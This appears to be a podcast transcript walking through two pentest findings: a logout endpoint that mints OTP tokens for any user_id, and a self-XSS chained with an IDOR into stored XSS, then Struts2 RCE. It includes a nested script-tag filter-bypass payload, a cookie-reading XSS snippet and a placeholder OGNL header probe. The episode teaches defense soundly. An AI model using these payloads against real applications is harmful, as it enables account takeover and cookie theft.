
Hacked & Secured: Pentest Exploits & Mitigations
If you know how attacks work, you’ll know exactly where to look—whether you’re breaking in as an ethical hacker or defending as a blue teamer.
Hacked & Secured: Pentest Exploits & Mitigations breaks down real-world pentest findings, exposing how vulnerabilities were discovered, exploited, and mitigated.
Each episode dives into practical security lessons, covering attack chains and creative exploitation techniques used by ethical hackers. Whether you're a pentester, security engineer, developer, or blue teamer, you'll gain actionable insights to apply in your work.
🎧 New episodes every month.
🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram, Website Link
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us → podcast@quailu.com.au
Ep. 8 – OTP Flaw & Remote Code Execution: When Small Flaws Go Critical
A broken logout flow let attackers hijack accounts using just a user ID.
A self-XSS chained with an IDOR turned into stored XSS against other users. And a forgotten internal tool—running outdated software—ended in full Remote Code Execution.
This episode is all about how small bugs, missed checks, and overlooked services can lead to serious consequences.
Chapters:
00:00 - INTRO
01:22 - FINDING #1 - The Logout That Logged You In
07:12 - FINDING #2 - From Signature Field to Shell Access
14:40 - OUTRO
Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!
INTRO
What if logging out of an application didn’t end your session—but logged you into someone else’s account?
And what if a series of low-impact bugs, like self-XSS and IDOR, could be chained to target other users—while persistence and a second look at your recon led to a full remote code execution on a forgotten internal tool?
I’m Amin Malekpour, and you’re listening to Hacked & Secured: Pentest Exploits & Mitigations.
Today’s episode is all about how quiet bugs and overlooked endpoints can escalate fast when tested creatively.
And just a heads-up—we’re moving to a monthly schedule. From now on, new episodes will drop on the last Friday of every month.
That gives us more time to go deeper into each story, feature more community submissions, and bring you even better content.
Alright, let’s dive into today’s episode.
FINDING #1 - The Logout That Logged You In
You’re just trying to log out. You tap the button, and that’s it—the session ends.
But behind the scenes, the app sends a request to the server that says, “Hey, this user wants to log out.”
Now usually, the server just closes your session and confirms you’re signed out.
But in this case… something strange happened.
The logout request didn’t just end the session. It accidentally gave the attacker access to someone else’s account.
This is exactly what korniltsev discovered on HackerOne—a critical authentication flaw in a login system that used OTP, or one-time passwords, to sign users in and out.
And with just one change in the logout request, the attacker could log in as any user.
Now let me slow this down for anyone new to OTP or passwordless systems.
Some apps don’t ask for your password when you log in.
Instead, they send you a one-time login link—maybe to your email or your phone—and all you have to do is tap it. No password needed.
These are called one-tap login systems, or passwordless login flows. They’re designed to be fast and easy, especially on mobile apps.
But here’s the problem. If the server trusts the wrong data—like a user ID sent from the phone—things can go very wrong.
Let me explain it this way.
Imagine a parking attendant at a hotel.
You walk up and say, “Hey, I’m car number 42. I’m ready to leave.”
And without checking who you are, the attendant hands you the keys to car number 42.
That’s what this bug did.
The attacker sent a logout request to the server. But instead of their own user ID, they inserted the user ID of someone else—someone they wanted to impersonate.
And the server replied, “Alright, here’s a fresh login token for that user.”
No validation. No check. Just “Okay, you must be them.”
That single mistake gave the attacker full access to another user’s account.
No password, no phishing. Just a change to one field.
Now let’s go step by step and break down exactly how the attacker discovered this.
The researcher started by logging into their own test account. While watching the traffic, they noticed that the logout request sent to the server included a user_id parameter. The logout worked fine when that value matched their actual session.
But here’s where things got interesting.
They modified that user ID to someone else’s—just a random ID they had grabbed through another part of the app, like a friend list or a shared reference. Then they sent the logout request again… but with the victim’s ID.
And what came back?
A successful response… with a brand new OTP token, but this time, for the victim’s account.
No validation. No error. Just a token for someone else.
They copied that token and plugged it into the normal login flow—submitting it along with the victim’s username—and it worked. The server returned a full session. They were now logged in as the victim.
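To make that flow concrete, here's a minimal Python sketch of the flaw. The endpoint, parameter names, and token format are illustrative assumptions, not details from the original report:

```python
# Hypothetical sketch of the logout-token flaw. Endpoint and field
# names are illustrative assumptions, not from the HackerOne report.

def build_logout_request(user_id: str) -> dict:
    """The mobile app's logout call, as observed in intercepted traffic."""
    return {
        "method": "POST",
        "path": "/api/auth/logout",
        "body": {"user_id": user_id},  # client-supplied: the core flaw
    }

def vulnerable_server(request: dict) -> dict:
    # A vulnerable backend keys everything off the request body alone,
    # so it mints a fresh OTP token for whichever user_id it receives.
    uid = request["body"]["user_id"]  # trusted blindly, no session check
    return {"status": "ok", "otp_token": f"otp-for-{uid}"}

# 1. Attacker logs out normally with their own ID: works as expected.
own = build_logout_request("1001")

# 2. Attacker swaps in a victim's ID grabbed elsewhere in the app.
forged = build_logout_request("4242")

print(vulnerable_server(forged))  # token for user 4242, not the attacker
```

The whole exploit is that one swapped field: the server never asks whether the caller's session actually belongs to the user_id in the body.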
And here’s the scariest part: there were no unusual tricks involved. They didn’t brute force anything, didn’t crack any tokens, didn’t bypass anything obvious. The server just… trusted the wrong thing.
Now let’s pause here for a second.
You’re doing a pentest. You find a logout request that includes a user ID. What’s your move?
Do you change it and replay the request? Do you see what the server sends back?
Because this is where attacker mindset matters. Most people wouldn’t think to test logout endpoints. But great pentesters do.
They know that authentication is often weakest not at the start or the end—but in the transition between steps.
And believe it or not—this kind of vulnerability can still show up in modern apps.
Especially ones that rely on magic links, one-tap login flows, or federated identity, where the frontend handles most of the interaction, and the backend gets lazy about validating identity at every step.
Anywhere a token is issued without double-checking who requested it, there’s a risk of the same kind of session confusion.
Now if you're designing these systems—if you're the one writing the backend or deciding what needs to be validated—here’s what you should’ve done differently.
- Never trust user-controlled identifiers when issuing or revoking sessions. Always validate that the user ID in the request matches the session that made the request.
- And don’t treat logout as a low-risk endpoint. If it triggers a new token or updates the session state, it should be treated with the same level of caution as login.
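Here's a minimal sketch of what that server-side check could look like, with hypothetical session storage and field names:

```python
# Sketch of the fix: resolve identity from the server-side session,
# never from client-supplied fields. Names are illustrative assumptions.
SESSIONS = {"sess-abc": "1001"}  # session token -> authenticated user id

def logout(session_token: str, body: dict) -> dict:
    real_uid = SESSIONS.get(session_token)
    if real_uid is None:
        return {"status": 401, "error": "not authenticated"}
    # Reject any mismatch instead of trusting body["user_id"].
    if body.get("user_id") not in (None, real_uid):
        return {"status": 403, "error": "user_id does not match session"}
    SESSIONS.pop(session_token)  # end the session; issue no new token
    return {"status": 200, "message": "logged out"}

print(logout("sess-abc", {"user_id": "4242"}))  # mismatch: attack blocked
```

Note the second half of the fix, too: logout ends the session and returns nothing an attacker could reuse. No fresh token should ever come back from a logout call.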
This whole bug happened because the backend assumed the client was being honest.
And that’s where most design-level failures begin—not with broken cryptography, but with broken trust.
Alright, fellow pentesters—here’s how you find vulnerabilities like this in your daily engagements.
- When you’re testing login and logout flows, slow them down. Watch for any step that takes user input and turns it into a token, a redirect, or a session update.
- If you see something like a user ID being passed in a request, try changing it.
If the server gives you a different user’s session or returns a successful response… you’ve found the opening.
This wasn’t about bypassing authentication logic with code injection or manipulating cookies. It was just a quiet little parameter… that no one was watching. And that’s exactly where attackers look.
FINDING #2 - From Signature Field to Shell Access
We started this episode with a single parameter in a logout request… that gave attackers full access to any user account.
But some pentests go even deeper.
What starts as a small bug in one feature suddenly leads you somewhere else—a new discovery, a new system, a whole new level of impact.
This next finding is exactly that.
It was reported by Rogerio Resende in a Medium.com blog post. He was working as part of a collaborative pentest team, where each person tackled different parts of the application.
Right from the start, one of his teammates was finding Insecure Direct Object References (IDORs) in several parts of the application.
At the same time, Rogerio focused on the front-end and started testing for cross-site scripting.
And that’s where the first discovery happened.
There was a user setting where people could update their email signature—just a basic form field. Rogerio dropped in a test payload to see if it would reflect unsanitized input.
The app was stripping out script tags. So his first attempt was blocked.
But he didn’t stop.
Instead, he created a slightly obfuscated payload—by breaking up the word "script" using partial tags and nested brackets. Something like closing and reopening HTML tags mid-word so the filter couldn’t catch it properly.
And that worked.
The app filtered some parts, but what was left reassembled into a working script tag—triggering a self-XSS.
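Here's a small Python sketch of how a single-pass filter can be defeated by a nested payload. The filter itself is an assumption, reconstructed from the description above, not the app's actual code:

```python
import re

def naive_filter(html: str) -> str:
    # A single, non-recursive pass that strips literal <script> tags,
    # roughly the kind of filtering described (an assumption on my part).
    return re.sub(r"</?script[^>]*>", "", html, flags=re.IGNORECASE)

# Plain payload: blocked, the tags are stripped outright.
print(naive_filter("<script>alert(1)</script>"))  # -> alert(1)

# Nested payload: the inner tags are stripped, and what's left
# reassembles into a working script tag.
payload = "<scr<script>ipt>alert(1)</scr</script>ipt>"
print(naive_filter(payload))  # -> <script>alert(1)</script>
```

The defense lesson is the mirror image: sanitize recursively (or better, encode output instead of stripping input), because a one-pass blocklist can be rebuilt around.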
Now, a self-XSS by itself isn’t serious. It only runs when the attacker triggers it in their own browser.
But here’s where things get clever.
Rogerio knew that his teammate had found an IDOR—one that let them update another user’s signature field.
So they combined the two.
Use the IDOR to overwrite another user’s signature, and include the XSS payload.
Now the moment that user opens their settings? The payload runs silently in their browser.
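A rough sketch of that chain, with hypothetical endpoint and storage names, and the vulnerable server simulated as a plain function:

```python
# Hypothetical sketch of chaining the IDOR with the self-XSS payload.
# Field names and the nested payload shape are illustrative assumptions.
SIGNATURES = {"1001": "Regards, Attacker", "4242": "Cheers, Victim"}

def update_signature(target_user_id: str, new_signature: str) -> None:
    # The IDOR: no check that the caller actually owns target_user_id.
    SIGNATURES[target_user_id] = new_signature

# The attacker writes their filter-bypassing payload into the
# victim's signature field instead of their own.
xss_payload = "<scr<script>ipt>alert(document.cookie)</scr</script>ipt>"
update_signature("4242", xss_payload)

# When the victim next loads their settings page, the stored payload
# renders in *their* browser: self-XSS has become stored XSS.
print(SIGNATURES["4242"])
```

Two findings that were each low severity on their own combine into an attack against arbitrary users, which is why reports should always consider chainability.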
That’s the kind of attacker thinking that takes a basic finding and turns it into something real.
But Rogerio didn’t stop there.
Toward the end of the engagement, he went back to his initial nmap scan results. Just reviewing the work—looking at open ports again—and that’s when he spotted something unusual.
A web service on a non-standard port.
When he opened it in the browser, it looked like a really old CI/CD tool interface. One of those legacy admin panels no one wants to maintain… but it was publicly accessible.
Now here’s where his discipline stands out.
That server wasn’t listed in the pentest scope. So instead of poking around, he paused the test and contacted the client.
They confirmed it was okay to test—and he went ahead.
He pointed Burp Suite at it and ran a quick Active Scan.
And the results came back with something big.
The server was running a vulnerable version of Apache Struts2—a framework known for high-impact Remote Code Execution vulnerabilities.
To confirm, Rogerio crafted a simple test payload based on a known exploit for a Struts2 file upload bug.
This vulnerability worked by injecting special syntax into HTTP headers like Content-Type. If the server mishandled the input, it would treat part of the header as executable code.
So instead of sending a normal value like “application/json” as the Content-Type, the attacker could insert an expression containing something like #cmd='whoami' inside the header.
Rogerio ran the test—and the server responded with output from the whoami command.
That was it.
Remote Code Execution confirmed on a publicly exposed system.
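For illustration, here's a heavily simplified Python sketch of that kind of probe. The target URL is hypothetical and the header value is only a placeholder; real public proof-of-concepts for this class of Struts2 bug (widely documented as CVE-2017-5638, my assumption since the post doesn't name a CVE) embed a much longer OGNL expression:

```python
# Simplified, non-functional sketch of a Struts2 Content-Type probe.
# Host, port, and the expression are placeholders, not a working exploit.
import urllib.request

TARGET = "http://legacy-ci.example.internal:8088/"  # hypothetical host

# The attack abuses the Content-Type header: an OGNL expression wrapped
# in %{...} gets evaluated by the vulnerable multipart parser instead of
# being treated as a plain media type.
malicious_content_type = "%{(#cmd='whoami')}"  # placeholder expression only

req = urllib.request.Request(
    TARGET,
    headers={"Content-Type": malicious_content_type},
)
# urllib.request.urlopen(req)  # on a vulnerable host, the response body
#                              # would contain the command's output
```

The point of the sketch is where the injection lives: a header the server is supposed to parse, not execute, which is why the bug was confirmable with a single harmless command like whoami.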
Now pause and think about this.
At the beginning of the test, they found a self-XSS. Then they chained it with an IDOR to make it impactful.
And after all that, when most people would’ve submitted the report and moved on—Rogerio went back, reviewed his old recon, found something suspicious, double-checked the scope, and ended the engagement with a critical RCE.
That’s how real pentests unfold.
You don’t always get a perfect chain from start to finish. Sometimes your best finding shows up at the very end—because you were patient and curious.
And yes—this kind of RCE vulnerability still shows up in the wild.
There are still internal apps, staging systems, forgotten dashboards running vulnerable versions of frameworks like Struts, Jenkins, or Spring.
They often fly under the radar because no one remembers they exist until a pentester or an attacker finds them.
So what went wrong here?
- First, the CI/CD tool should never have been exposed to the internet.
- Second, the Struts2 version should’ve been updated years ago—this vulnerability was publicly documented and exploited in the wild.
- And third—there should’ve been a system in place to flag legacy services before they ever made it into production-facing infrastructure. If your organisation doesn’t know which services are exposed, attackers will find them before you do.
For those of you who are building or designing applications, here’s how this kind of issue can be prevented.
- Start by keeping a clear inventory of every system that is exposed. If you don’t know it’s online, you can’t defend it.
- Always keep your frameworks up to date—especially the ones like Struts that have a long history of critical vulnerabilities.
- And never leave internal tools or admin panels open to the internet. If you absolutely have to, make sure they’re properly hardened, monitored, and locked behind strict access controls.
These aren’t complex fixes. But if they’re missed, the consequences can be huge.
Alright, if you’re a pentester, here’s what to take away from this.
- Always go back to your recon. Don’t trust that every IP or port was tested properly on day one. Look at the full picture. Review your scans. Revisit low-priority items. You might find something there that others missed.
- Keep an eye out for outdated libraries and frameworks. If you spot something like an old version of Struts or Spring, don’t ignore it—go research the known CVEs. You might already have a working exploit without realising it.
- Also—don’t underestimate “weak” bugs like self-XSS. With the right second vulnerability—like an IDOR—they can become powerful.
- And finally—know when to ask for scope clarification. That one email to the client? It led to the highest-impact finding of the whole pentest.
Always remember, pentesting isn’t about fancy tools or lucky guesses—it’s about staying curious, spotting what others miss, and knowing that even one overlooked detail can lead to a critical finding. So stay sharp, keep learning, and always dig a little deeper—because that next discovery might be just one payload away.
OUTRO
Every issue we explored today started with something small—a logout request, a signature field, a forgotten port.
But they all led to serious impact: account takeover, stored XSS, and unauthenticated remote code execution.
And none of these would’ve been fixed without creative thinking, persistence, and responsible disclosure.
If this episode helped you learn something new, share it with one or two people who’d find it useful. Maybe someone who is building backend auth flows, reviewing legacy systems, or testing bugs that seem small at first. This might be the one episode that helps them catch an issue before it turns into something serious.
Let’s make cybersecurity knowledge accessible to all. See you in the next episode.